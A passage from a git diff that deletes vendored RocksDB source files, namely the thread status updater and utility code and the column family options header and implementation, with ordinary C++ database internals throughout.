-  void SetThreadOperation(const ThreadStatus::OperationType type);
-
-  // The start time of the current thread operation.  It is in the format
-  // of micro-seconds since some fixed point in time.
-  void SetOperationStartTime(const uint64_t start_time);
-
-  // Set the "i"th property of the current operation.
-  //
-  // NOTE: Our practice here is to set all the thread operation properties
-  //       and stage before we set thread operation, and thread operation
-  //       will be set in std::memory_order_release.  This is to ensure
-  //       whenever a thread operation is not OP_UNKNOWN, we will always
-  //       have a consistent information on its properties.
-  void SetThreadOperationProperty(
-      int i, uint64_t value);
-
-  // Increase the "i"th property of the current operation with
-  // the specified delta.
-  void IncreaseThreadOperationProperty(
-      int i, uint64_t delta);
-
-  // Update the thread operation stage of the current thread.
-  ThreadStatus::OperationStage SetThreadOperationStage(
-      const ThreadStatus::OperationStage stage);
-
-  // Clear thread operation of the current thread.
-  void ClearThreadOperation();
-
-  // Reset all thread-operation-properties to 0.
-  void ClearThreadOperationProperties();
-
-  // Update the thread state of the current thread.
-  void SetThreadState(const ThreadStatus::StateType type);
-
-  // Clear the thread state of the current thread.
-  void ClearThreadState();
-
-  // Obtain the status of all active registered threads.
-  Status GetThreadList(
-      std::vector<ThreadStatus>* thread_list);
-
-  // Create an entry in the global ColumnFamilyInfo table for the
-  // specified column family.  This function should be called only
-  // when the current thread does not hold db_mutex.
-  void NewColumnFamilyInfo(
-      const void* db_key, const std::string& db_name,
-      const void* cf_key, const std::string& cf_name);
-
-  // Erase all ConstantColumnFamilyInfo that is associated with the
-  // specified db instance.  This function should be called only when
-  // the current thread does not hold db_mutex.
-  void EraseDatabaseInfo(const void* db_key);
-
-  // Erase the ConstantColumnFamilyInfo that is associated with the
-  // specified ColumnFamilyData.  This function should be called only
-  // when the current thread does not hold db_mutex.
-  void EraseColumnFamilyInfo(const void* cf_key);
-
-  // Verifies whether the input ColumnFamilyHandles matches
-  // the information stored in the current cf_info_map.
-  void TEST_VerifyColumnFamilyInfoMap(
-      const std::vector<ColumnFamilyHandle*>& handles,
-      bool check_exist);
-
- protected:
-#ifdef ROCKSDB_USING_THREAD_STATUS
-  // The thread-local variable for storing thread status.
-  static __thread ThreadStatusData* thread_status_data_;
-
-  // Returns the pointer to the thread status data only when the
-  // thread status data is non-null and has enable_tracking == true.
-  ThreadStatusData* GetLocalThreadStatus();
-
-  // Directly returns the pointer to thread_status_data_ without
-  // checking whether enabling_tracking is true of not.
-  ThreadStatusData* Get() {
-    return thread_status_data_;
-  }
-
-  // The mutex that protects cf_info_map and db_key_map.
-  std::mutex thread_list_mutex_;
-
-  // The current status data of all active threads.
-  std::unordered_set<ThreadStatusData*> thread_data_set_;
-
-  // A global map that keeps the column family information.  It is stored
-  // globally instead of inside DB is to avoid the situation where DB is
-  // closing while GetThreadList function already get the pointer to its
-  // CopnstantColumnFamilyInfo.
-  std::unordered_map<
-      const void*, std::unique_ptr<ConstantColumnFamilyInfo>> cf_info_map_;
-
-  // A db_key to cf_key map that allows erasing elements in cf_info_map
-  // associated to the same db_key faster.
-  std::unordered_map<
-      const void*, std::unordered_set<const void*>> db_key_map_;
-
-#else
-  static ThreadStatusData* thread_status_data_;
-#endif  // ROCKSDB_USING_THREAD_STATUS
-};
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/monitoring/thread_status_updater_debug.cc b/thirdparty/rocksdb/monitoring/thread_status_updater_debug.cc
deleted file mode 100644
index eec52e1..0000000
--- a/thirdparty/rocksdb/monitoring/thread_status_updater_debug.cc
+++ /dev/null
@@ -1,46 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#include <mutex>
-
-#include "db/column_family.h"
-#include "monitoring/thread_status_updater.h"
-
-namespace rocksdb {
-
-#ifndef NDEBUG
-#ifdef ROCKSDB_USING_THREAD_STATUS
-void ThreadStatusUpdater::TEST_VerifyColumnFamilyInfoMap(
-    const std::vector<ColumnFamilyHandle*>& handles,
-    bool check_exist) {
-  std::unique_lock<std::mutex> lock(thread_list_mutex_);
-  if (check_exist) {
-    assert(cf_info_map_.size() == handles.size());
-  }
-  for (auto* handle : handles) {
-    auto* cfd = reinterpret_cast<ColumnFamilyHandleImpl*>(handle)->cfd();
-    auto iter __attribute__((unused)) = cf_info_map_.find(cfd);
-    if (check_exist) {
-      assert(iter != cf_info_map_.end());
-      assert(iter->second);
-      assert(iter->second->cf_name == cfd->GetName());
-    } else {
-      assert(iter == cf_info_map_.end());
-    }
-  }
-}
-
-#else
-
-void ThreadStatusUpdater::TEST_VerifyColumnFamilyInfoMap(
-    const std::vector<ColumnFamilyHandle*>& handles,
-    bool check_exist) {
-}
-
-#endif  // ROCKSDB_USING_THREAD_STATUS
-#endif  // !NDEBUG
-
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/monitoring/thread_status_util.cc b/thirdparty/rocksdb/monitoring/thread_status_util.cc
deleted file mode 100644
index 50692df..0000000
--- a/thirdparty/rocksdb/monitoring/thread_status_util.cc
+++ /dev/null
@@ -1,222 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#include "monitoring/thread_status_util.h"
-
-#include "monitoring/thread_status_updater.h"
-#include "rocksdb/env.h"
-
-namespace rocksdb {
-
-
-#ifdef ROCKSDB_USING_THREAD_STATUS
-__thread ThreadStatusUpdater*
-    ThreadStatusUtil::thread_updater_local_cache_ = nullptr;
-__thread bool ThreadStatusUtil::thread_updater_initialized_ = false;
-
-void ThreadStatusUtil::RegisterThread(
-    const Env* env, ThreadStatus::ThreadType thread_type) {
-  if (!MaybeInitThreadLocalUpdater(env)) {
-    return;
-  }
-  assert(thread_updater_local_cache_);
-  thread_updater_local_cache_->RegisterThread(
-      thread_type, env->GetThreadID());
-}
-
-void ThreadStatusUtil::UnregisterThread() {
-  thread_updater_initialized_ = false;
-  if (thread_updater_local_cache_ != nullptr) {
-    thread_updater_local_cache_->UnregisterThread();
-    thread_updater_local_cache_ = nullptr;
-  }
-}
-
-void ThreadStatusUtil::SetColumnFamily(const ColumnFamilyData* cfd,
-                                       const Env* env,
-                                       bool enable_thread_tracking) {
-  if (!MaybeInitThreadLocalUpdater(env)) {
-    return;
-  }
-  assert(thread_updater_local_cache_);
-  if (cfd != nullptr && enable_thread_tracking) {
-    thread_updater_local_cache_->SetColumnFamilyInfoKey(cfd);
-  } else {
-    // When cfd == nullptr or enable_thread_tracking == false, we set
-    // ColumnFamilyInfoKey to nullptr, which makes SetThreadOperation
-    // and SetThreadState become no-op.
-    thread_updater_local_cache_->SetColumnFamilyInfoKey(nullptr);
-  }
-}
-
-void ThreadStatusUtil::SetThreadOperation(ThreadStatus::OperationType op) {
-  if (thread_updater_local_cache_ == nullptr) {
-    // thread_updater_local_cache_ must be set in SetColumnFamily
-    // or other ThreadStatusUtil functions.
-    return;
-  }
-
-  if (op != ThreadStatus::OP_UNKNOWN) {
-    uint64_t current_time = Env::Default()->NowMicros();
-    thread_updater_local_cache_->SetOperationStartTime(current_time);
-  } else {
-    // TDOO(yhchiang): we could report the time when we set operation to
-    // OP_UNKNOWN once the whole instrumentation has been done.
-    thread_updater_local_cache_->SetOperationStartTime(0);
-  }
-  thread_updater_local_cache_->SetThreadOperation(op);
-}
-
-ThreadStatus::OperationStage ThreadStatusUtil::SetThreadOperationStage(
-    ThreadStatus::OperationStage stage) {
-  if (thread_updater_local_cache_ == nullptr) {
-    // thread_updater_local_cache_ must be set in SetColumnFamily
-    // or other ThreadStatusUtil functions.
-    return ThreadStatus::STAGE_UNKNOWN;
-  }
-
-  return thread_updater_local_cache_->SetThreadOperationStage(stage);
-}
-
-void ThreadStatusUtil::SetThreadOperationProperty(
-    int code, uint64_t value) {
-  if (thread_updater_local_cache_ == nullptr) {
-    // thread_updater_local_cache_ must be set in SetColumnFamily
-    // or other ThreadStatusUtil functions.
-    return;
-  }
-
-  thread_updater_local_cache_->SetThreadOperationProperty(
-      code, value);
-}
-
-void ThreadStatusUtil::IncreaseThreadOperationProperty(
-    int code, uint64_t delta) {
-  if (thread_updater_local_cache_ == nullptr) {
-    // thread_updater_local_cache_ must be set in SetColumnFamily
-    // or other ThreadStatusUtil functions.
-    return;
-  }
-
-  thread_updater_local_cache_->IncreaseThreadOperationProperty(
-      code, delta);
-}
-
-void ThreadStatusUtil::SetThreadState(ThreadStatus::StateType state) {
-  if (thread_updater_local_cache_ == nullptr) {
-    // thread_updater_local_cache_ must be set in SetColumnFamily
-    // or other ThreadStatusUtil functions.
-    return;
-  }
-
-  thread_updater_local_cache_->SetThreadState(state);
-}
-
-void ThreadStatusUtil::ResetThreadStatus() {
-  if (thread_updater_local_cache_ == nullptr) {
-    return;
-  }
-  thread_updater_local_cache_->ResetThreadStatus();
-}
-
-void ThreadStatusUtil::NewColumnFamilyInfo(const DB* db,
-                                           const ColumnFamilyData* cfd,
-                                           const std::string& cf_name,
-                                           const Env* env) {
-  if (!MaybeInitThreadLocalUpdater(env)) {
-    return;
-  }
-  assert(thread_updater_local_cache_);
-  if (thread_updater_local_cache_) {
-    thread_updater_local_cache_->NewColumnFamilyInfo(db, db->GetName(), cfd,
-                                                     cf_name);
-  }
-}
-
-void ThreadStatusUtil::EraseColumnFamilyInfo(
-    const ColumnFamilyData* cfd) {
-  if (thread_updater_local_cache_ == nullptr) {
-    return;
-  }
-  thread_updater_local_cache_->EraseColumnFamilyInfo(cfd);
-}
-
-void ThreadStatusUtil::EraseDatabaseInfo(const DB* db) {
-  ThreadStatusUpdater* thread_updater = db->GetEnv()->GetThreadStatusUpdater();
-  if (thread_updater == nullptr) {
-    return;
-  }
-  thread_updater->EraseDatabaseInfo(db);
-}
-
-bool ThreadStatusUtil::MaybeInitThreadLocalUpdater(const Env* env) {
-  if (!thread_updater_initialized_ && env != nullptr) {
-    thread_updater_initialized_ = true;
-    thread_updater_local_cache_ = env->GetThreadStatusUpdater();
-  }
-  return (thread_updater_local_cache_ != nullptr);
-}
-
-AutoThreadOperationStageUpdater::AutoThreadOperationStageUpdater(
-    ThreadStatus::OperationStage stage) {
-  prev_stage_ = ThreadStatusUtil::SetThreadOperationStage(stage);
-}
-
-AutoThreadOperationStageUpdater::~AutoThreadOperationStageUpdater() {
-  ThreadStatusUtil::SetThreadOperationStage(prev_stage_);
-}
-
-#else
-
-ThreadStatusUpdater* ThreadStatusUtil::thread_updater_local_cache_ = nullptr;
-bool ThreadStatusUtil::thread_updater_initialized_ = false;
-
-bool ThreadStatusUtil::MaybeInitThreadLocalUpdater(const Env* env) {
-  return false;
-}
-
-void ThreadStatusUtil::SetColumnFamily(const ColumnFamilyData* cfd,
-                                       const Env* env,
-                                       bool enable_thread_tracking) {}
-
-void ThreadStatusUtil::SetThreadOperation(ThreadStatus::OperationType op) {
-}
-
-void ThreadStatusUtil::SetThreadOperationProperty(
-    int code, uint64_t value) {
-}
-
-void ThreadStatusUtil::IncreaseThreadOperationProperty(
-    int code, uint64_t delta) {
-}
-
-void ThreadStatusUtil::SetThreadState(ThreadStatus::StateType state) {
-}
-
-void ThreadStatusUtil::NewColumnFamilyInfo(const DB* db,
-                                           const ColumnFamilyData* cfd,
-                                           const std::string& cf_name,
-                                           const Env* env) {}
-
-void ThreadStatusUtil::EraseColumnFamilyInfo(
-    const ColumnFamilyData* cfd) {
-}
-
-void ThreadStatusUtil::EraseDatabaseInfo(const DB* db) {
-}
-
-void ThreadStatusUtil::ResetThreadStatus() {
-}
-
-AutoThreadOperationStageUpdater::AutoThreadOperationStageUpdater(
-    ThreadStatus::OperationStage stage) {
-}
-
-AutoThreadOperationStageUpdater::~AutoThreadOperationStageUpdater() {
-}
-
-#endif  // ROCKSDB_USING_THREAD_STATUS
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/monitoring/thread_status_util.h b/thirdparty/rocksdb/monitoring/thread_status_util.h
deleted file mode 100644
index a403435..0000000
--- a/thirdparty/rocksdb/monitoring/thread_status_util.h
+++ /dev/null
@@ -1,134 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#pragma once
-
-#include <string>
-
-#include "monitoring/thread_status_updater.h"
-#include "rocksdb/db.h"
-#include "rocksdb/env.h"
-#include "rocksdb/thread_status.h"
-
-namespace rocksdb {
-
-class ColumnFamilyData;
-
-// The static utility class for updating thread-local status.
-//
-// The thread-local status is updated via the thread-local cached
-// pointer thread_updater_local_cache_.  During each function call,
-// when ThreadStatusUtil finds thread_updater_local_cache_ is
-// left uninitialized (determined by thread_updater_initialized_),
-// it will tries to initialize it using the return value of
-// Env::GetThreadStatusUpdater().  When thread_updater_local_cache_
-// is initialized by a non-null pointer, each function call will
-// then update the status of the current thread.  Otherwise,
-// all function calls to ThreadStatusUtil will be no-op.
-class ThreadStatusUtil {
- public:
-  // Register the current thread for tracking.
-  static void RegisterThread(
-      const Env* env, ThreadStatus::ThreadType thread_type);
-
-  // Unregister the current thread.
-  static void UnregisterThread();
-
-  // Create an entry in the global ColumnFamilyInfo table for the
-  // specified column family.  This function should be called only
-  // when the current thread does not hold db_mutex.
-  static void NewColumnFamilyInfo(const DB* db, const ColumnFamilyData* cfd,
-                                  const std::string& cf_name, const Env* env);
-
-  // Erase the ConstantColumnFamilyInfo that is associated with the
-  // specified ColumnFamilyData.  This function should be called only
-  // when the current thread does not hold db_mutex.
-  static void EraseColumnFamilyInfo(const ColumnFamilyData* cfd);
-
-  // Erase all ConstantColumnFamilyInfo that is associated with the
-  // specified db instance.  This function should be called only when
-  // the current thread does not hold db_mutex.
-  static void EraseDatabaseInfo(const DB* db);
-
-  // Update the thread status to indicate the current thread is doing
-  // something related to the specified column family.
-  static void SetColumnFamily(const ColumnFamilyData* cfd, const Env* env,
-                              bool enable_thread_tracking);
-
-  static void SetThreadOperation(ThreadStatus::OperationType type);
-
-  static ThreadStatus::OperationStage SetThreadOperationStage(
-      ThreadStatus::OperationStage stage);
-
-  static void SetThreadOperationProperty(
-      int code, uint64_t value);
-
-  static void IncreaseThreadOperationProperty(
-      int code, uint64_t delta);
-
-  static void SetThreadState(ThreadStatus::StateType type);
-
-  static void ResetThreadStatus();
-
-#ifndef NDEBUG
-  static void TEST_SetStateDelay(
-      const ThreadStatus::StateType state, int micro);
-  static void TEST_StateDelay(const ThreadStatus::StateType state);
-#endif
-
- protected:
-  // Initialize the thread-local ThreadStatusUpdater when it finds
-  // the cached value is nullptr.  Returns true if it has cached
-  // a non-null pointer.
-  static bool MaybeInitThreadLocalUpdater(const Env* env);
-
-#ifdef ROCKSDB_USING_THREAD_STATUS
-  // A boolean flag indicating whether thread_updater_local_cache_
-  // is initialized.  It is set to true when an Env uses any
-  // ThreadStatusUtil functions using the current thread other
-  // than UnregisterThread().  It will be set to false when
-  // UnregisterThread() is called.
-  //
-  // When this variable is set to true, thread_updater_local_cache_
-  // will not be updated until this variable is again set to false
-  // in UnregisterThread().
-  static  __thread bool thread_updater_initialized_;
-
-  // The thread-local cached ThreadStatusUpdater that caches the
-  // thread_status_updater_ of the first Env that uses any ThreadStatusUtil
-  // function other than UnregisterThread().  This variable will
-  // be cleared when UnregisterThread() is called.
-  //
-  // When this variable is set to a non-null pointer, then the status
-  // of the current thread will be updated when a function of
-  // ThreadStatusUtil is called.  Otherwise, all functions of
-  // ThreadStatusUtil will be no-op.
-  //
-  // When thread_updater_initialized_ is set to true, this variable
-  // will not be updated until this thread_updater_initialized_ is
-  // again set to false in UnregisterThread().
-  static __thread ThreadStatusUpdater* thread_updater_local_cache_;
-#else
-  static bool thread_updater_initialized_;
-  static ThreadStatusUpdater* thread_updater_local_cache_;
-#endif
-};
-
-// A helper class for updating thread state.  It will set the
-// thread state according to the input parameter in its constructor
-// and set the thread state to the previous state in its destructor.
-class AutoThreadOperationStageUpdater {
- public:
-  explicit AutoThreadOperationStageUpdater(
-      ThreadStatus::OperationStage stage);
-  ~AutoThreadOperationStageUpdater();
-
-#ifdef ROCKSDB_USING_THREAD_STATUS
- private:
-  ThreadStatus::OperationStage prev_stage_;
-#endif
-};
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/monitoring/thread_status_util_debug.cc b/thirdparty/rocksdb/monitoring/thread_status_util_debug.cc
deleted file mode 100644
index b4fa584..0000000
--- a/thirdparty/rocksdb/monitoring/thread_status_util_debug.cc
+++ /dev/null
@@ -1,32 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#include <atomic>
-
-#include "monitoring/thread_status_updater.h"
-#include "monitoring/thread_status_util.h"
-#include "rocksdb/env.h"
-
-namespace rocksdb {
-
-#ifndef NDEBUG
-// the delay for debugging purpose.
-static std::atomic<int> states_delay[ThreadStatus::NUM_STATE_TYPES];
-
-void ThreadStatusUtil::TEST_SetStateDelay(
-    const ThreadStatus::StateType state, int micro) {
-  states_delay[state].store(micro, std::memory_order_relaxed);
-}
-
-void ThreadStatusUtil::TEST_StateDelay(const ThreadStatus::StateType state) {
-  auto delay = states_delay[state].load(std::memory_order_relaxed);
-  if (delay > 0) {
-    Env::Default()->SleepForMicroseconds(delay);
-  }
-}
-
-#endif  // !NDEBUG
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/options/cf_options.cc b/thirdparty/rocksdb/options/cf_options.cc
deleted file mode 100644
index 67cbef6..0000000
--- a/thirdparty/rocksdb/options/cf_options.cc
+++ /dev/null
@@ -1,179 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#include "options/cf_options.h"
-
-#ifndef __STDC_FORMAT_MACROS
-#define __STDC_FORMAT_MACROS
-#endif
-
-#include <inttypes.h>
-#include <cassert>
-#include <limits>
-#include <string>
-#include "options/db_options.h"
-#include "port/port.h"
-#include "rocksdb/env.h"
-#include "rocksdb/options.h"
-
-namespace rocksdb {
-
-ImmutableCFOptions::ImmutableCFOptions(const Options& options)
-    : ImmutableCFOptions(ImmutableDBOptions(options), options) {}
-
-ImmutableCFOptions::ImmutableCFOptions(const ImmutableDBOptions& db_options,
-                                       const ColumnFamilyOptions& cf_options)
-    : compaction_style(cf_options.compaction_style),
-      compaction_pri(cf_options.compaction_pri),
-      compaction_options_universal(cf_options.compaction_options_universal),
-      compaction_options_fifo(cf_options.compaction_options_fifo),
-      prefix_extractor(cf_options.prefix_extractor.get()),
-      user_comparator(cf_options.comparator),
-      internal_comparator(InternalKeyComparator(cf_options.comparator)),
-      merge_operator(cf_options.merge_operator.get()),
-      compaction_filter(cf_options.compaction_filter),
-      compaction_filter_factory(cf_options.compaction_filter_factory.get()),
-      min_write_buffer_number_to_merge(
-          cf_options.min_write_buffer_number_to_merge),
-      max_write_buffer_number_to_maintain(
-          cf_options.max_write_buffer_number_to_maintain),
-      inplace_update_support(cf_options.inplace_update_support),
-      inplace_callback(cf_options.inplace_callback),
-      info_log(db_options.info_log.get()),
-      statistics(db_options.statistics.get()),
-      rate_limiter(db_options.rate_limiter.get()),
-      env(db_options.env),
-      allow_mmap_reads(db_options.allow_mmap_reads),
-      allow_mmap_writes(db_options.allow_mmap_writes),
-      db_paths(db_options.db_paths),
-      memtable_factory(cf_options.memtable_factory.get()),
-      table_factory(cf_options.table_factory.get()),
-      table_properties_collector_factories(
-          cf_options.table_properties_collector_factories),
-      advise_random_on_open(db_options.advise_random_on_open),
-      bloom_locality(cf_options.bloom_locality),
-      purge_redundant_kvs_while_flush(
-          cf_options.purge_redundant_kvs_while_flush),
-      use_fsync(db_options.use_fsync),
-      compression_per_level(cf_options.compression_per_level),
-      bottommost_compression(cf_options.bottommost_compression),
-      compression_opts(cf_options.compression_opts),
-      level_compaction_dynamic_level_bytes(
-          cf_options.level_compaction_dynamic_level_bytes),
-      access_hint_on_compaction_start(
-          db_options.access_hint_on_compaction_start),
-      new_table_reader_for_compaction_inputs(
-          db_options.new_table_reader_for_compaction_inputs),
-      compaction_readahead_size(db_options.compaction_readahead_size),
-      num_levels(cf_options.num_levels),
-      optimize_filters_for_hits(cf_options.optimize_filters_for_hits),
-      force_consistency_checks(cf_options.force_consistency_checks),
-      allow_ingest_behind(db_options.allow_ingest_behind),
-      listeners(db_options.listeners),
-      row_cache(db_options.row_cache),
-      max_subcompactions(db_options.max_subcompactions),
-      memtable_insert_with_hint_prefix_extractor(
-          cf_options.memtable_insert_with_hint_prefix_extractor.get()) {}
-
-// Multiple two operands. If they overflow, return op1.
-uint64_t MultiplyCheckOverflow(uint64_t op1, double op2) {
-  if (op1 == 0 || op2 <= 0) {
-    return 0;
-  }
-  if (port::kMaxUint64 / op1 < op2) {
-    return op1;
-  }
-  return static_cast<uint64_t>(op1 * op2);
-}
-
-void MutableCFOptions::RefreshDerivedOptions(int num_levels,
-                                             CompactionStyle compaction_style) {
-  max_file_size.resize(num_levels);
-  for (int i = 0; i < num_levels; ++i) {
-    if (i == 0 && compaction_style == kCompactionStyleUniversal) {
-      max_file_size[i] = ULLONG_MAX;
-    } else if (i > 1) {
-      max_file_size[i] = MultiplyCheckOverflow(max_file_size[i - 1],
-                                               target_file_size_multiplier);
-    } else {
-      max_file_size[i] = target_file_size_base;
-    }
-  }
-}
-
-uint64_t MutableCFOptions::MaxFileSizeForLevel(int level) const {
-  assert(level >= 0);
-  assert(level < (int)max_file_size.size());
-  return max_file_size[level];
-}
-
-void MutableCFOptions::Dump(Logger* log) const {
-  // Memtable related options
-  ROCKS_LOG_INFO(log,
-                 "                        write_buffer_size: %" ROCKSDB_PRIszt,
-                 write_buffer_size);
-  ROCKS_LOG_INFO(log, "                  max_write_buffer_number: %d",
-                 max_write_buffer_number);
-  ROCKS_LOG_INFO(log,
-                 "                         arena_block_size: %" ROCKSDB_PRIszt,
-                 arena_block_size);
-  ROCKS_LOG_INFO(log, "              memtable_prefix_bloom_ratio: %f",
-                 memtable_prefix_bloom_size_ratio);
-  ROCKS_LOG_INFO(log,
-                 "                  memtable_huge_page_size: %" ROCKSDB_PRIszt,
-                 memtable_huge_page_size);
-  ROCKS_LOG_INFO(log,
-                 "                    max_successive_merges: %" ROCKSDB_PRIszt,
-                 max_successive_merges);
-  ROCKS_LOG_INFO(log,
-                 "                 inplace_update_num_locks: %" ROCKSDB_PRIszt,
-                 inplace_update_num_locks);
-  ROCKS_LOG_INFO(log, "                 disable_auto_compactions: %d",
-                 disable_auto_compactions);
-  ROCKS_LOG_INFO(log, "      soft_pending_compaction_bytes_limit: %" PRIu64,
-                 soft_pending_compaction_bytes_limit);
-  ROCKS_LOG_INFO(log, "      hard_pending_compaction_bytes_limit: %" PRIu64,
-                 hard_pending_compaction_bytes_limit);
-  ROCKS_LOG_INFO(log, "       level0_file_num_compaction_trigger: %d",
-                 level0_file_num_compaction_trigger);
-  ROCKS_LOG_INFO(log, "           level0_slowdown_writes_trigger: %d",
-                 level0_slowdown_writes_trigger);
-  ROCKS_LOG_INFO(log, "               level0_stop_writes_trigger: %d",
-                 level0_stop_writes_trigger);
-  ROCKS_LOG_INFO(log, "                     max_compaction_bytes: %" PRIu64,
-                 max_compaction_bytes);
-  ROCKS_LOG_INFO(log, "                    target_file_size_base: %" PRIu64,
-                 target_file_size_base);
-  ROCKS_LOG_INFO(log, "              target_file_size_multiplier: %d",
-                 target_file_size_multiplier);
-  ROCKS_LOG_INFO(log, "                 max_bytes_for_level_base: %" PRIu64,
-                 max_bytes_for_level_base);
-  ROCKS_LOG_INFO(log, "           max_bytes_for_level_multiplier: %f",
-                 max_bytes_for_level_multiplier);
-  std::string result;
-  char buf[10];
-  for (const auto m : max_bytes_for_level_multiplier_additional) {
-    snprintf(buf, sizeof(buf), "%d, ", m);
-    result += buf;
-  }
-  if (result.size() >= 2) {
-    result.resize(result.size() - 2);
-  } else {
-    result = "";
-  }
-
-  ROCKS_LOG_INFO(log, "max_bytes_for_level_multiplier_additional: %s",
-                 result.c_str());
-  ROCKS_LOG_INFO(log, "        max_sequential_skip_in_iterations: %" PRIu64,
-                 max_sequential_skip_in_iterations);
-  ROCKS_LOG_INFO(log, "                     paranoid_file_checks: %d",
-                 paranoid_file_checks);
-  ROCKS_LOG_INFO(log, "                       report_bg_io_stats: %d",
-                 report_bg_io_stats);
-  ROCKS_LOG_INFO(log, "                              compression: %d",
-                 static_cast<int>(compression));
-}
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/options/cf_options.h b/thirdparty/rocksdb/options/cf_options.h
deleted file mode 100644
index f376729..0000000
--- a/thirdparty/rocksdb/options/cf_options.h
+++ /dev/null
@@ -1,239 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#pragma once
-
-#include <string>
-#include <vector>
-
-#include "db/dbformat.h"
-#include "options/db_options.h"
-#include "rocksdb/options.h"
-#include "util/compression.h"
-
-namespace rocksdb {
-
-// ImmutableCFOptions is a data struct used by RocksDB internal. It contains a
-// subset of Options that should not be changed during the entire lifetime
-// of DB. Raw pointers defined in this struct do not have ownership to the data
-// they point to. Options contains shared_ptr to these data.
-struct ImmutableCFOptions {
-  ImmutableCFOptions();
-  explicit ImmutableCFOptions(const Options& options);
-
-  ImmutableCFOptions(const ImmutableDBOptions& db_options,
-                     const ColumnFamilyOptions& cf_options);
-
-  CompactionStyle compaction_style;
-
-  CompactionPri compaction_pri;
-
-  CompactionOptionsUniversal compaction_options_universal;
-  CompactionOptionsFIFO compaction_options_fifo;
-
-  const SliceTransform* prefix_extractor;
-
-  const Comparator* user_comparator;
-  InternalKeyComparator internal_comparator;
-
-  MergeOperator* merge_operator;
-
-  const CompactionFilter* compaction_filter;
-
-  CompactionFilterFactory* compaction_filter_factory;
-
-  int min_write_buffer_number_to_merge;
-
-  int max_write_buffer_number_to_maintain;
-
-  bool inplace_update_support;
-
-  UpdateStatus (*inplace_callback)(char* existing_value,
-                                   uint32_t* existing_value_size,
-                                   Slice delta_value,
-                                   std::string* merged_value);
-
-  Logger* info_log;
-
-  Statistics* statistics;
-
-  RateLimiter* rate_limiter;
-
-  InfoLogLevel info_log_level;
-
-  Env* env;
-
-  // Allow the OS to mmap file for reading sst tables. Default: false
-  bool allow_mmap_reads;
-
-  // Allow the OS to mmap file for writing. Default: false
-  bool allow_mmap_writes;
-
-  std::vector<DbPath> db_paths;
-
-  MemTableRepFactory* memtable_factory;
-
-  TableFactory* table_factory;
-
-  Options::TablePropertiesCollectorFactories
-      table_properties_collector_factories;
-
-  bool advise_random_on_open;
-
-  // This options is required by PlainTableReader. May need to move it
-  // to PlainTableOptions just like bloom_bits_per_key
-  uint32_t bloom_locality;
-
-  bool purge_redundant_kvs_while_flush;
-
-  bool use_fsync;
-
-  std::vector<CompressionType> compression_per_level;
-
-  CompressionType bottommost_compression;
-
-  CompressionOptions compression_opts;
-
-  bool level_compaction_dynamic_level_bytes;
-
-  Options::AccessHint access_hint_on_compaction_start;
-
-  bool new_table_reader_for_compaction_inputs;
-
-  size_t compaction_readahead_size;
-
-  int num_levels;
-
-  bool optimize_filters_for_hits;
-
-  bool force_consistency_checks;
-
-  bool allow_ingest_behind;
-
-  // A vector of EventListeners which call-back functions will be called
-  // when specific RocksDB event happens.
-  std::vector<std::shared_ptr<EventListener>> listeners;
-
-  std::shared_ptr<Cache> row_cache;
-
-  uint32_t max_subcompactions;
-
-  const SliceTransform* memtable_insert_with_hint_prefix_extractor;
-};
-
-struct MutableCFOptions {
-  explicit MutableCFOptions(const ColumnFamilyOptions& options)
-      : write_buffer_size(options.write_buffer_size),
-        max_write_buffer_number(options.max_write_buffer_number),
-        arena_block_size(options.arena_block_size),
-        memtable_prefix_bloom_size_ratio(
-            options.memtable_prefix_bloom_size_ratio),
-        memtable_huge_page_size(options.memtable_huge_page_size),
-        max_successive_merges(options.max_successive_merges),
-        inplace_update_num_locks(options.inplace_update_num_locks),
-        disable_auto_compactions(options.disable_auto_compactions),
-        soft_pending_compaction_bytes_limit(
-            options.soft_pending_compaction_bytes_limit),
-        hard_pending_compaction_bytes_limit(
-            options.hard_pending_compaction_bytes_limit),
-        level0_file_num_compaction_trigger(
-            options.level0_file_num_compaction_trigger),
-        level0_slowdown_writes_trigger(options.level0_slowdown_writes_trigger),
-        level0_stop_writes_trigger(options.level0_stop_writes_trigger),
-        max_compaction_bytes(options.max_compaction_bytes),
-        target_file_size_base(options.target_file_size_base),
-        target_file_size_multiplier(options.target_file_size_multiplier),
-        max_bytes_for_level_base(options.max_bytes_for_level_base),
-        max_bytes_for_level_multiplier(options.max_bytes_for_level_multiplier),
-        max_bytes_for_level_multiplier_additional(
-            options.max_bytes_for_level_multiplier_additional),
-        max_sequential_skip_in_iterations(
-            options.max_sequential_skip_in_iterations),
-        paranoid_file_checks(options.paranoid_file_checks),
-        report_bg_io_stats(options.report_bg_io_stats),
-        compression(options.compression) {
-    RefreshDerivedOptions(options.num_levels, options.compaction_style);
-  }
-
-  MutableCFOptions()
-      : write_buffer_size(0),
-        max_write_buffer_number(0),
-        arena_block_size(0),
-        memtable_prefix_bloom_size_ratio(0),
-        memtable_huge_page_size(0),
